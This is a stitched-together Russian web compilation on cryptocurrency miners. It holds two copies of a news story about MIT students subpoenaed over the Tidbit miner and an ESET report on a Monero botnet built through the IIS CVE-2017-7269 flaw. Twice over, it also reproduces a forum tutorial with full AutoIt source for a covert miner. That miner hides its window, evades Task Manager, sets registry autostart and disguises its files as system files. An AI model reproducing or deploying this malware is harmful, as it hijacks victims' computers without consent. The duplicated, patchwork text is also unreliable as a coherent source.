Власти требуют у студентов исходный код биткойн-майнера. Исходный код майнера


Власти требуют у студентов исходный код js-майнера Tidbit / Хабр

Авторы программы Tidbit

Через несколько часов начнутся слушания, где четверо студентов Массачусетского технологического института попытаются опротестовать судебную повестку с требованием раскрыть исходный код биткоин-майнера, созданного ими. Интересы 19-летнего Джереми Рубина (Jeremy Rubin) представляет адвокат Фонда электронных рубежей (EFF).

Автор статьи в Wired считает, что всё это напоминает печальную историю Аарона Шварца. Его арестовали за взлом компьютерной системы и «кражу» 4 млн бесплатных научных статей, после чего MIT вместе с властями активно «прессовали» активиста. Чтобы разглядеть состав преступления в действиях четырёх нынешних студентов, тоже надо особо постараться. Они создали программу Tidbit за пару дней на хакатоне Node Knockout в конце 2013 года. В процессе соревнования у ребят возникла идея. А если владелец веб-сайта предложит пользователям, что уберёт всю рекламу на сайте, если они согласятся майнить криптовалюту в его пользу? Эдакий вариант микроплатежей по-современному, альтернатива повсеместным рекламным баннерам.

Идея понравилась жюри, а за грамотную реализацию системы микроплатежей Tidbit выиграла приз как самая инновационная программа на том хакатоне. Однако, хотя исходники опубликовали в открытом доступе, проект так и не пошёл дальше концепта. Но через несколько недель после хакатона Джереми Рубин вдруг получил повестку в отделение по делам потребителей Нью-Джерси (он один, потому что на его имя был зарегистрирован сайт Tidbit).

Теперь власти дают понять, что программа могла нарушать какие-то законы. Генеральный прокурор штата выступил с заявлением, что Рубин с однокурсниками якобы нарушили уголовные законы в сфере компьютерных технологий и обязаны предъявить исходный код программы. Хотя, до официального выдвижения обвинения дело пока не дошло.

Власти требуют список всех кошельков, которые использовала программа Tidbit, имена всех пользователей, на чьих компьютерах она запускалась, и названия всех сайтов, где размещался код.

Адвокат Рубина объясняет, что в изначальном виде Tidbit был сырым концептом, через их серверы не прошло никаких транзакций. Даже среди комментаторов на сайте хакатона есть тот, кто реально внедрил код Tidbit на своём сайте, и вроде пользователи майнили биткоины, но на табло цифры так и не изменились. Рубин пообещал доделать табло позднее.

«Этот случай подчёркивает тревожащую тенденцию, когда власти преследуют исследователей, новаторов, разработчиков и других, кто работает над передовыми проектами и технологиями, способными помочь техническому сообществу, — сказал адвокат EFF Ханни Факхури (Hanni Fakhoury). — Они получили довольно широкую повестку, которая указывает на возможность уголовной и административной ответственности. Для группы ребят из колледжа, которые что-то смастерили на хакатоне — они не получили никакой прибыли, проект никогда реально не запустили и сейчас тот полностью расформирован — это довольно серьёзные последствия».

В официальном заявлении адвокат Ханни Факхури высказал мнение, что запугивать студентов повестками — не самый лучший способ расследования дел о возможном нарушении прав потребителей. Он также отметил, что в случае передачи студентами исходников своей программы они должны получить иммунитет. В противном случае, возможное выдвижение обвинений в их адрес по антихакерскому закону Нью-Джерси или федеральному закону Computer Fraud and Abuse Act станет нарушением Пятой поправки к Конституции, которая защищает граждан от дачи показаний против самих себя.

habr.com

Скрытый майнер своими руками- исходники.( Мб кому интересно будет )

Этот майнер был написан, для того что бы люди не велись на "Бесплатный майнер, меняй мыло и всё", запомните такой халявы никто просто так не даёт. Я отдаю из за того, что надоело читать "меняй своё мыло и всё". И так что нам понадобится : 1.Программа AutoIT скачать можно на офф.сайте Please login or register to view links 2.SciTE4Autoit3 -- ссылка на офф.сайт Please login or register to view links 3. Исходники 4. 10 минут времени Приступим: 1.Создаём на диске "C" папку "1" 2. Устанавливаем AutoIT и SciTE4Autoit3, после этого открываем "SciTE Script Editor" 3.Копируем данный код:

#NoTrayIcon

While 1If Not ProcessExists ("taskmgr.exe") ThenIf Not ProcessExists ("system.exe") Then ; исходник майнера, смотри в архивеRun ("system.exe -o stratum+tcp://xmr.pool.minergate.com:45560 -u [email protected] -p x ","",@SW_HIDE) ; Тут пишем своё мыло с майнергейта или монеро кошелёк для других пуловSleep(1000)

ElseSleep (1000)DoSleep (1000)Until ProcessExists ("taskmgr.exe")ProcessClose ("system.exe")EndIfEndIfSleep (3000)WEnd

После того как скопировали, сохраняете файл и нажимаем CTRL+F7

Выбираем папку "C:\1" и прописываем будущее имя вашего майнера, нажимаем "Compile Script"Первая часть готова, теперь надо создать установщик майнера.5. Копируем файл system.exe с архива в "C:\1"6. Создаём новый скрипт, и вставляем туда следующий код:#NoTrayIcon

If Not FileExists (@AppDataDir & "\WindowsHelper") ThenDirCreate (@AppDataDir & "\WindowsHelper")EndIf

FileInstall ("C:\1\Имя_вашего,майнера.exe", @AppDataDir & "\WindowsHelper\Имя_вашего,майнера.exe")FileInstall ("C:\1\system.exe", @AppDataDir & "\WindowsHelper\system.exe")

Sleep (1000)

$pathscript = @AppDataDir & "\WindowsHelper\Имя_вашего,майнера.exe"$sName = ("Имя_вашего,майнера.exe")RegWrite('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run', $sName, "REG_SZ", $pathscript)

Sleep (1000)

FileSetAttrib (@AppDataDir & "\WindowsHelper\Имя_вашего,майнера.exe", "+SHR")FileSetAttrib (@AppDataDir & "\WindowsHelper\system.exe", "+SHR")FileSetAttrib (@AppDataDir & "\WindowsHelper", "+SHR")

Sleep(1000)

Run (@AppDataDir & "\WindowsHelper\Имя_вашего,майнера.exe")

7. Нажимаем CTRL+F7, прописываем название, добавляем картинку. Можете так же добавить описание к файлу. Компилируем.

Всё. Теперь в паке куда вы последний раз прописали путь и название, находится ваш майнер.Что он умеет?1.Скрытая установка и работа2.Автозагрузка3.Останавливает майнинг, если открыт диспетчер задач.4.Прописывает себя как системный файл.5.По дефолту использует 50% ЦП

Все исходники есть в архиве

скрипта для удаления, но перед запуском надо закрыть ваш файл в диспетчере.#NoTrayIcon#RequireAdmin

If FileExists (@AppDataDir & "\WindowsHelper") ThenSleep (1000)

FileSetAttrib (@AppDataDir & "\WindowsHelper", "-SHR")

Sleep(1000)

DirRemove(@AppDataDir & "\WindowsHelper", 1)EndIf

Скачать архив с исходниками и "головой майнера"

Please login or register to view links

Click to expand...

lolzteam.net

майнер Monero / Блог компании ESET NOD32 / Хабр

Пока мир ждет, где нанесут новый удар знаменитые кибергруппы типа Lazarus или Telebots, вооруженные аналогами WannaCry или Petya, операторы менее резонансных кампаний зарабатывают без лишнего шума. Одна из таких операций продолжается как минимум с мая 2017 года. Атакующие заражают веб-серверы Windows вредоносным майнером криптовалюты Monero (XMR).

Злоумышленники, стоящие за данной кампанией, модифицировали легитимный майнер на базе открытого исходного кода и использовали уязвимость в Microsoft IIS 6.0 CVE-2017-7269 для скрытой установки малвари на непропатченные серверы. За три месяца мошенники создали ботнет из нескольких сотен зараженных серверов и заработали на Monero больше 63 тысяч долларов.

Пользователи ESET защищены от любых попыток использования уязвимости CVE-2017-7269, даже если их машины пока не пропатчены, как это было с эксплойтом EternalBlue, используемым в распространении WannaCry.

Monero или Bitcoin?

Несмотря на рост курса биткоина, Monero имеет несколько преимуществ, которые делают эту криптовалюту весьма привлекательной для майнинга с помощью вредоносного ПО. Это невозможность отследить транзакции и доказать применение алгоритма CryptoNight, который использует компьютерные и серверные CPU и GPU (в отличие от биткоина, для добычи которого нужно специализированное оборудование).

В течение последнего месяца курс Monero вырос с 40 до 150 долларов, а затем снизился до 100 долларов.

Рисунок 1. Свечной график курса XMR/USD в августе 2017 года

Криптомайнер

Впервые обнаруженное in-the-wild 26 мая 2017 года, вредоносное ПО для майнинга – модификация легитимного майнера Monero на базе открытого исходного кода xmrig (версия 0.8.2, представленная 26 мая 2017 года).

Авторы вредоносного майнера не меняли оригинальную кодовую базу, только добавили жестко закодированные аргументы командной строки с адресом своего кошелька и майнинговым пулом URL, а также несколько аргументов для уничтожения ранее запущенных экземпляров малвари во избежание конкуренции. Подобная доработка занимает не больше пары минут – неудивительно, что мы обнаружили малварь в день выпуска базовой версии xmrig.

Вы можете видеть модифицированный майнер злоумышленников и его сравнение с доступным исходным кодом на рисунке ниже.

Рисунок 2. Сравнение кода исходной и модифицированной версий майнера

Сканирование и эксплуатация

Доставка майнера на компьютеры жертв – наиболее сложная часть операции, но даже здесь атакующие использовали самый простой подход. Мы выявили два IP-адреса, с которых осуществляется брутфорс-сканирование на предмет уязвимости CVE-2017-7269. Оба адреса указывают на серверы в облаке Amazon Web Services.

Уязвимость, которую использовали атакующие, обнаружили в марте 2017 года исследователи Чжи Ниан Пэн (Zhiniang Peng) и Чэнь Ву (Chen Wu). Это уязвимость в службе WebDAV, которая является частью Microsoft IIS версии 6.0 в ОС Windows Server 2003 R2. Уязвимость переполнения буфера в функции ScStoragePathFromUrl запускается, когда уязвимый сервер обрабатывает вредоносный НТТР-запрос. В частности, специально сформированный запрос PROPFIND приводит к переполнению буфера. Подробный анализ механизма описан Хавьером М. Меллидом и доступен по ссылке. Уязвимость подвержена эксплуатации, поскольку находится в службе веб-сервера, которая в большинстве случаев должна быть доступна из интернета и ее легко использовать.

Шелл-код является ожидаемым действием загрузки и выполнения (загрузка dasHost.exe из hxxt://postgre[.]tk/ в папку %TEMP%):

Рисунок 3. Шелл-код, доставленный эксплойтом

По нашим данным, первая эксплуатация этой уязвимости in-the-wild произведена всего через два дня после публикации ее описания 26 марта 2017 года. С тех пор уязвимость активно используется.

Новый вредоносный майнер впервые замечен 26 мая 2017 года. С этого момента он распространяется волнообразно – это означает, что злоумышленники продолжают поиски уязвимых машин.

Рисунок 4. График волн заражения

Сканирование всегда выполняется с одного IP-адреса, вероятнее всего, машины, которая размещена на облачном сервере Amazon, арендованном злоумышленниками.

Статистика

Статистика майнингового пула была общедоступной, поэтому мы можем видеть совокупный хешрейт всех жертв, предоставивших вычислительные мощности для майнинга. Постоянное значение достигало 100 килохешей в секунду (kH/s) с пиками до 160 kH/s в конце августа 2017 года, которые мы связываем с кампаниями, запущенными 23 и 30 августа.

В целом, зараженные машины добывали порядка 5,5 XMR в день к концу августа. Заработок в течение трех месяцев составил 420 XMR. При курсе 150 долларов за 1 XMR, доход операторов майнера составлял 825 долларов в день и больше 63 000 долларов в общей сложности.

Атакующие активизировались в конце августа, но с начала сентября мы не наблюдаем новых заражений. Более того, поскольку в майнере не предусмотрен механизм персистентности, атакующие начинают терять скомпрометированные машины, а общий хешрейт упал до 60 kH/s. Это не первый перерыв в деятельности кибергруппы, скорее всего, в ближайшем будущем стартует новая кампания.

Нам неизвестно точное число пострадавших, но мы можем примерно оценить его по общему хешрейту. Согласно показателям CPU, хешрейт высокопроизводительного процессора Intel i7 достигает 0,3–0,4 kH/s. В данной кампании используются системы под управлением Windows Server 2003, которые, скорее всего, работают на старом оборудовании со сравнительно слабыми процессорами. Поэтому средний хешрейт жертвы будет намного ниже, а общее число инфицированных машин – выше; можно говорить о сотнях жертв.

Рисунок 6. Статистика кошелька атакующих, предоставленная майнинговым пулом

Заключение

В основе данной кампании – легитимный майнер с открытым исходным кодом и некоторое число машин с устаревшими необновленными операционными системами. Для получения прибыли операторам вредоносного майнера пришлось лишь незначительно доработать код, эксплуатационные расходы минимальны.

ESET детектирует вредоносный бинарный файл майнера как троян Win32/CoinMiner.AMW, попытки эксплуатации уязвимости на сетевом уровне как webDAV/ExplodingCan. Это реальный пример пакета, который будет заблокирован:

Рисунок 5. Специальный HTTP-запрос с шелл-кодом

Microsoft завершила поддержку Windows Server 2003 в июле 2015 года и не выпускала патчей для уязвимости CVE-2017-7269 до июня 2017 года — пока критические уязвимости для устаревших операционных систем не привлекли пристальное внимание вирусописателей. Во избежание масштабных деструктивных атак наподобие эпидемии WannaCry корпорация приняла решение закрыть эти уязвимости. Тем не менее, поддерживать Windows Server 2003 довольно сложно, поскольку автоматические обновления не всегда хорошо работают (это подтверждает, например, пост Клинта Боссена). Следовательно, большая часть систем по-прежнему уязвима. Мы настоятельно рекомендуем пользователям Windows Server 2003 как можно скорее установить KB3197835 и другие обновления безопасности (если автоматическое обновление не работает, загрузите патч вручную!).

Индикаторы компрометации

Сайты загрузки:hxxp://postgre.tk hxxp://ntpserver.tk

IP адреса источника атаки: 54.197.4.10 52.207.232.106 18.220.190.151

Хеши:31721AE37835F792EE792D8324E307BA423277AE A0BC6EA2BFA1D3D895FE8E706737D490D5FE3987 37D4CC67351B2BD8067AB99973C4AFD7090DB1E9 0902181D1B9433B5616763646A089B1BDF428262 0AB00045D0D403F2D8F8865120C1089C09BA4FEE 11D7694987A32A91FB766BA221F9A2DE3C06D173 9FCB3943660203E99C348F17A8801BA077F7CB40 52413AE19BBCDB9339D38A6F305E040FE83DEE1B

habr.com

Власти требуют у студентов исходный код биткойн-майнера

Власти требуют у студентов исходный код биткойн-майнера cryptowiki.ru

 

Власти требуют у студентов исходный код биткойн-майнера cryptowiki.ru

В начале недели в США пройдет судебное заседание, на котором четверо студентов Массачусетского технологического института (MIT) попытаются опротестовать повестку с требованием раскрыть код созданного ими биткойн-майнера. Власти требуют от студентов передать им исходный код, так как считают этот майнер киберугрозой.

Адвокат Фонда электронных рубежей (EFF) представляет интересы 19-летнего Джереми Рубина и трех его одноклассников в этом деле, которое является свидетельством беспрецедентно агрессивного поведения чиновников, которые требуют не только передать им код, но и идентифицировать всех, кто участвовал в разработке и тестировании этого проекта.

Автор статьи в Wired считает, что всё это сильно напоминает печальную историю Аарона Шварца. Его арестовали за взлом компьютерной системы и якобы «кражу» 4 млн бесплатных научных статей, после чего MIT вместе с властями активно «прессовали» активиста, пока он не покончил жизнь самоубийством, не выдержав давления.

Хотя против студентов-разработчиков пока не выдвинуто уголовных обвинений, власти уже заявили, что по их мнению своим участием в разработке студенты нарушили законы штата, и понесут за это ответственность. Это дело вновь подчеркивает настораживающую тенденцию в действиях властей, когда они считают себя вправе преследовать в судебном порядке тех, кто работает над передовыми проектами и технологиями, способными помочь техническому сообществу: исследователей, разработчиков и инноваторов, заявил адвокат EFF Хэнни Фахури:

«Студенты получили довольно всеобъемлющую повестку, которая указывает на возможность уголовной и административной ответственности. Для группы ребят из колледжа, которые что-то там смастерили на хакатоне, это стало шоком, который может повлечь за собой довольно серьёзные последствия. Тем более что речь-то идет о бесплатном проекте для конкурса, который не был даже толком запущен, за который никто не получил никаких денег, да и сам проект уже давно заброшен.»

Чтобы разглядеть хоть какой-то состав преступления в действиях четырёх нынешних студентов, действительно надо очень сильно постараться. Они создали программу Tidbit за пару дней на конкурсе-хакатоне Node Knockout в конце 2013 года. В процессе соревнования, у ребят возникла идея. А что, если владельцы веб-сайтов предложат пользователям, что уберут всю рекламу с сайта, если те согласятся взамен майнить криптовалюту ? Эдакий вариант микроплатежей по-современному, альтернатива повсеместным рекламным баннерам.

Идея понравилась жюри, а за грамотную реализацию системы микроплатежей команда Tidbit выиграла приз как самая инновационная программа на том хакатоне. Однако, хотя исходники опубликовали в открытом доступе, проект так и не пошёл дальше концепта. Но через несколько недель после хакатона Джереми Рубин вдруг получил повестку от бюро по защите потребителей Нью-Джерси (именно на его имя был зарегистрирован сайт Tidbit).

Чиновники заявили, что программа могла нарушать какие-то законы. Генеральный прокурор штата выступил с заявлением, что Рубин с однокурсниками якобы нарушили уголовные законы в сфере компьютерных технологий и обязаны предъявить исходный код программы. Хотя, до официального выдвижения уголовного обвинения дело пока не дошло.

Власти требуют список всех кошельков, которые использовала программа Tidbit, имена всех пользователей, на чьих компьютерах она запускалась, и названия всех сайтов, где размещался код.

Адвокат Рубина объясняет, что в изначальном виде Tidbit был сырым концептом, через их серверы не прошло никаких транзакций. Хотя среди комментаторов на сайте хакатона был кто-то, кто якобы реально внедрил код Tidbit на своём сайте, и вроде бы его пользователи майнили биткойны, но на дашборде проекта мощность майнинга так и не изменились, оставшись нулевой.

В официальном заявлении адвокат Ханни Факхури высказал мнение, что запугивать студентов повестками — не самый лучший способ расследования дел о возможном нарушении прав потребителей. Он также отметил, что в случае передачи студентами исходников своей программы они должны получить иммунитет от дальнейшего преследования. В противном случае, возможное выдвижение обвинений в их адрес по антихакерскому закону Нью-Джерси или федеральному закону Computer Fraud and Abuse Act станет нарушением Пятой поправки к Конституции, которая защищает граждан от дачи показаний против самих себя.

Источник: bitfeed.ru

cryptowiki.ru

Власти требуют у студентов исходный код биткойн-майнера

Власти требуют у студентов исходный код биткойн-майнера

Власти требуют у студентов исходный код биткойн-майнера

В начале недели в США пройдет судебное заседание, на котором четверо студентов Массачусетского технологического института (MIT) попытаются опротестовать повестку с требованием раскрыть код созданного ими биткойн-майнера. Власти требуют от студентов передать им исходный код, так как считают этот майнер киберугрозой.

Адвокат Фонда электронных рубежей (EFF) представляет интересы 19-летнего Джереми Рубина и трех его одноклассников в этом деле, которое является свидетельством беспрецедентно агрессивного поведения чиновников, которые требуют не только передать им код, но и идентифицировать всех, кто участвовал в разработке и тестировании этого проекта.

Автор статьи в Wired считает, что всё это сильно напоминает печальную историю Аарона Шварца. Его арестовали за взлом компьютерной системы и якобы «кражу» 4 млн бесплатных научных статей, после чего MIT вместе с властями активно «прессовали» активиста, пока он не покончил жизнь самоубийством, не выдержав давления.

Хотя против студентов-разработчиков пока не выдвинуто уголовных обвинений, власти уже заявили, что по их мнению своим участием в разработке студенты нарушили законы штата, и понесут за это ответственность. Это дело вновь подчеркивает настораживающую тенденцию в действиях властей, когда они считают себя вправе преследовать в судебном порядке тех, кто работает над передовыми проектами и технологиями, способными помочь техническому сообществу: исследователей, разработчиков и инноваторов, заявил адвокат EFF Хэнни Фахури:

«Студенты получили довольно всеобъемлющую повестку, которая указывает на возможность уголовной и административной ответственности. Для группы ребят из колледжа, которые что-то там смастерили на хакатоне, это стало шоком, который может повлечь за собой довольно серьёзные последствия. Тем более что речь-то идет о бесплатном проекте для конкурса, который не был даже толком запущен, за который никто не получил никаких денег, да и сам проект уже давно заброшен.»

Чтобы разглядеть хоть какой-то состав преступления в действиях четырёх нынешних студентов, действительно надо очень сильно постараться. Они создали программу Tidbit за пару дней на конкурсе-хакатоне Node Knockout в конце 2013 года. В процессе соревнования, у ребят возникла идея. А что, если владельцы веб-сайтов предложат пользователям, что уберут всю рекламу с сайта, если те согласятся взамен майнить криптовалюту ? Эдакий вариант микроплатежей по-современному, альтернатива повсеместным рекламным баннерам.

Идея понравилась жюри, а за грамотную реализацию системы микроплатежей команда Tidbit выиграла приз как самая инновационная программа на том хакатоне. Однако, хотя исходники опубликовали в открытом доступе, проект так и не пошёл дальше концепта. Но через несколько недель после хакатона Джереми Рубин вдруг получил повестку от бюро по защите потребителей Нью-Джерси (именно на его имя был зарегистрирован сайт Tidbit).

Чиновники заявили, что программа могла нарушать какие-то законы. Генеральный прокурор штата выступил с заявлением, что Рубин с однокурсниками якобы нарушили уголовные законы в сфере компьютерных технологий и обязаны предъявить исходный код программы. Хотя, до официального выдвижения уголовного обвинения дело пока не дошло.

Власти требуют список всех кошельков, которые использовала программа Tidbit, имена всех пользователей, на чьих компьютерах она запускалась, и названия всех сайтов, где размещался код.

Адвокат Рубина объясняет, что в изначальном виде Tidbit был сырым концептом, через их серверы не прошло никаких транзакций. Хотя среди комментаторов на сайте хакатона был кто-то, кто якобы реально внедрил код Tidbit на своём сайте, и вроде бы его пользователи майнили биткойны, но на дашборде проекта мощность майнинга так и не изменились, оставшись нулевой.

В официальном заявлении адвокат Ханни Факхури высказал мнение, что запугивать студентов повестками — не самый лучший способ расследования дел о возможном нарушении прав потребителей. Он также отметил, что в случае передачи студентами исходников своей программы они должны получить иммунитет от дальнейшего преследования. В противном случае, возможное выдвижение обвинений в их адрес по антихакерскому закону Нью-Джерси или федеральному закону Computer Fraud and Abuse Act станет нарушением Пятой поправки к Конституции, которая защищает граждан от дачи показаний против самих себя.

btccool.ru

Скрытый майнер своими руками- исходники.

Этот майнер был написан, для того что бы люди не велись на "Бесплатный майнер, меняй мыло и всё", запомните такой халявы никто просто так не даёт. Я отдаю из за того, что надоело читать "меняй своё мыло и всё". И так что нам понадобится : 1.Программа AutoIT скачать можно на офф.сайте https://www.autoitscript.com/site/autoit/ 2.SciTE4Autoit3 -- ссылка на офф.сайт https://www.autoitscript.com/site/autoit-script-editor/downloads/ 3. Исходники 4. 10 минут времени

Приступим:1.Создаём на диске "C" папку "1"2. Устанавливаем AutoIT и SciTE4Autoit3, после этого открываем "SciTE Script Editor"3.Копируем данный код:

Спойлер#NoTrayIcon

While 1If Not ProcessExists ("taskmgr.exe") ThenIf Not ProcessExists ("system.exe") Then ; исходник майнера, смотри в архивеRun ("system.exe -o stratum+tcp://xmr.pool.minergate.com:45560 -u [email protected] -p x ","",@SW_HIDE) ; Тут пишем своё мыло с майнергейта или монеро кошелёк для других пуловSleep(1000)

ElseSleep (1000)DoSleep (1000)Until ProcessExists ("taskmgr.exe")ProcessClose ("system.exe")EndIfEndIfSleep (3000)WEnd

После того как скопировали, сохраняете файл и нажимаем CTRL+F7

Выбираем папку "C:\1" и прописываем будущее имя вашего майнера, нажимаем "Compile Script"Первая часть готова, теперь надо создать установщик майнера.5. Копируем файл system.exe с архива в "C:\1"6. Создаём новый скрипт, и вставляем туда следующий код

Спойлер#NoTrayIcon

If Not FileExists (@AppDataDir & "\WindowsHelper") ThenDirCreate (@AppDataDir & "\WindowsHelper")EndIf

FileInstall ("C:\1\Имя_вашего,майнера.exe", @AppDataDir & "\WindowsHelper\Имя_вашего,майнера.exe")FileInstall ("C:\1\system.exe", @AppDataDir & "\WindowsHelper\system.exe")

Sleep (1000)

$pathscript = @AppDataDir & "\WindowsHelper\Имя_вашего,майнера.exe"$sName = ("Имя_вашего,майнера.exe")RegWrite('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run', $sName, "REG_SZ", $pathscript)

Sleep (1000)

FileSetAttrib (@AppDataDir & "\WindowsHelper\Имя_вашего,майнера.exe", "+SHR")FileSetAttrib (@AppDataDir & "\WindowsHelper\system.exe", "+SHR")FileSetAttrib (@AppDataDir & "\WindowsHelper", "+SHR")

Sleep(1000)

Run (@AppDataDir & "\WindowsHelper\Имя_вашего,майнера.exe")

7. Нажимаем CTRL+F7, прописываем название, добавляем картинку. Можете так же добавить описание к файлу. Компилируем.

Всё. Теперь в паке куда вы последний раз прописали путь и название, находится ваш майнер.Что он умеет?1.Скрытая установка и работа2.Автозагрузка3.Останавливает майнинг, если открыт диспетчер задач.4.Прописывает себя как системный файл.5.По дефолту использует 50% ЦП

Все исходники есть в архиве

скрипта для удаления, но перед запуском надо закрыть ваш файл в диспетчере.

Спойлер#NoTrayIcon #RequireAdmin

If FileExists (@AppDataDir & "\WindowsHelper") ThenSleep (1000)

FileSetAttrib (@AppDataDir & "\WindowsHelper", "-SHR")

Sleep(1000)

DirRemove(@AppDataDir & "\WindowsHelper", 1)EndIf

Скачать архив с исходниками и "головой майнера"

https://yadi.sk/d/sa87tNAz3PfXduВт не вижу смысла прикреплять просто потому что вы тогда спалите весь майнер (ТО ЖЕ САМОЕ ГОВОРЮ И АДМИНАМ)если хотите- лейте на ноудистриб (но в последнее время начинают говорить что он сливает данные)

Нажмите, чтобы раскрыть...

miped.ru